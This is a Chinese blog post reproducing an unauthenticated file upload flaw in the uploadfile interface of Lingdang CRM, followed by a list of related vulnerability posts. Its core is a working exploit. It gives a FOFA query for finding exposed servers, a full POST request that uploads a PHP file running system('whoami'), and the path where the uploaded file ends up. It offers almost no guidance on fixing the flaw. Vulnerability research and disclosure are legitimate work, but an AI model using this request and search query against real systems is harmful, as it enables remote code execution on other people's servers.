灵当CRM系统接口uploadfile文件上传漏洞

灵当CRM系统接口文件上传漏洞

最新推荐文章于 2025-08-08 09:36:51 发布

原创最新推荐文章于 2025-08-08 09:36:51 发布 · 510 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#web安全

灵当CRM系统接口uploadfile文件上传漏洞

灵当CRM系统接口uploadfile文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。

fofa

body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

在这里插入图片描述

首页

在这里插入图片描述

poc

POST /crm/weixinmp/index.php?userid=123&module=Upload&usid=1&action=uploadfile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close

file_info={"name":"1.php"}&<?php system("whoami");unlink(__FILE__);?>

文件路径

/crm/storage/2024/December/week4/回显文件名.php

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

0x大先生

关注关注

3
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

灵当CRM multipleUpload.php 文件上传致RCE漏洞复现

0xSec

09-09

673

灵当CRM multipleUpload.php 接口存在任意文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个web服务器。

灵当CRM uploadfile.php 文件上传致RCE漏洞复现

holyxp的博客

12-23

380

灵当CRM是一款专为中小企业打造的智能客户关系管理工具，由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、I服务、房地产等多个行业领域，帮助企业实现客户个性化管理需求，提升企业竞争力。无论是新客户开拓、老客户维护，还是销售过程管理、服务管理等方面，灵当CRM都能提供全面、高效的解决方案。是一款功能全面、用户友好、支持定制化、数据分析强大且价格合理的CRM软件，是中小型企业实现销售、服务、财务一体化管理的理想选择。

参与评论您还未登录，请先登录后发表或查看评论

灵当CRM weixinmp/index.php接口处存在文件上传漏洞漏洞预警

A_991128a的博客

03-20

372

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案。

【漏洞复现】灵当CRM multipleUpload.php接口处存在文件上传漏洞

qq_48368964的博客

09-27

1470

灵当CRM系统接口multipleUpload.php文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长!在mulipleUpload.php 接口处执行命令上传文件到目标服务器。根据ip拼接上传路径地址进行访问。

用友U8 CRM uploadfile 文件上传致RCE漏洞复现

0xSec

05-22

834

用友U8CRM客户关系管理系统uploadfile.php 文件存在任意文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而获取到服务器权限。

灵当CRM uploadfile 任意文件写入漏洞复现（附脚本）

iSee857的博客

12-25

346

灵当CRM uploadfil接口处存在任意文件写入漏洞，攻击者可通过该漏洞在上传任意文件至服务器上从而实现远程接管。

灵当CRM index.php 任意文件上传漏洞复现

iSee857的博客

10-17

1205

灵当CRM提供了一系列解决方案，支持新客户开拓、老客户维护、销售过程管理和服务管理等多方面的功能。首先确保系统限制了文件所必须的上传后缀，然后确保文件名不包含任何可能被解释为目录或遍历序列 ( ../) 的子字符串，同时做到重命名上传的文件以避免可能导致现有文件被覆盖的冲突并且上传文件的存储目录禁用执行权限。灵当CRM 路径/wechatSession/index.php没有对用户上传的文件进行限制，导致未经身份验证的远程攻击者可上传任意文件，从而远程执行任意命令，获取服务器权限。

灵当CRM yunzhijiaApi.php 存在SQL注入漏洞(CVE-2025-8345)

m0_50125527的博客

07-31

124

灵当CRM是一款专为中小企业打造的智能客户关系管理工具，由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、T服务、房地产等多个行业领域，帮助企业实现客户个性化管理需求，提升企业竞争力。无论是新客户开拓、老客户维护，还是销售过程管理、服务管理等方面，灵当CRM都能提供全面、高效的解决方案。是一款功能全面、用户友好、支持定制化、数据分析强大且价格合理的CRM软件，是中小型企业实现销售、服务、财务一体化管理的理想选择。

灵当CRM sql注入漏洞复现（CVE-2025-8345）

最新发布

iSee857的博客

08-08

231

灵当CRM yunzhijiaApi 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。（CVE-2025-8345）

漏洞挖掘---灵当CRM客户管理系统getOrderList SQL注入漏洞

m0_66808441的博客

03-30

421

灵当CRM是上海灵当信息科技有限公司旗下产品，适用于中小型企业。它功能丰富，涵盖销售、服务、财务等管理功能，具有性价比高、简洁易用、可定制、部署灵活等特点，能助力企业提升经营效益和客户满意度。

灵当CRM index.php SQL注入漏洞复现

iSee857的博客

09-20

1077

灵当CRM（Customer Relationship Management，客户关系管理）是一款面向中小企业的客户关系管理软件，旨在帮助企业更好地管理客户信息、销售流程、市场营销和服务支持等方面的工作。灵当CRM提供了一系列工具和功能，帮助企业在销售、市场和服务部门之间实现高效协作，提高客户满意度和业务效率。灵当CRM客户管理系统index.php 中参数没有预编译形式导致sql注入产生。参数使用预编译形式用以对sql注入防护，同时限制接口参数输入。

灵当CRM index.php接口SQL注入漏洞复现 [附POC]

薛定谔嘚喵博客

09-26

760

灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长!。灵当CRM marketing/index.php接口存在SQL注入漏洞。

灵当CRM multipleUpload.php接口处存在文件上传漏洞

nnn2188185的博客

09-24

244

客户忠诚度取决于战略警惕CRM四大陷阱

cneo34308的博客

09-16

234

客户忠诚度取决于战略警惕CRM四大陷阱　　很多公司的CRM计划之所以泡汤，是因为高层管理人员根本不明白他们实施的是什么计划。公司管理者在实施CRM计划中有可能落入的4个陷阱。每个陷阱的产生都源自同一个有漏洞的假设——CRM是一...

灵当crm pdf.php存在任意文件读取漏洞

缘梦未来的博客

12-14

492

灵当CRM是一款专为中小企业打造的智能客户关系管理工具，由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域，帮助企业实现客户个性化管理需求，提升企业竞争力。无论是新客户开拓、老客户维护，还是销售过程管理、服务管理等方面，灵当CRM都能提供全面、高效的解决方案。

智能AC管理系统HTTPD-AC 1.0服务存在未授权访问漏洞

nnn2188185的博客

09-19

358

微信公众号搜索：南风漏洞复现文库该文章南风漏洞复现文库公众号首发智能AC管理系统HTTPD-AC 1.0服务。

【漏洞复现】灵当CRM datapdf.php 任意文件读取漏洞

m0_71944965的博客

12-25

382

灵当CRM data/pdf.php 接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

如何使用wx.uploadFile接口上传文件？

04-01

使用wx.uploadFile接口可以实现文件上传功能。下面是使用wx.uploadFile接口的步骤： 1. 首先，需要引入微信小程序的API，可以在页面的js文件中添加以下代码： ```javascript const wx = require('weixin-js-sdk'); ...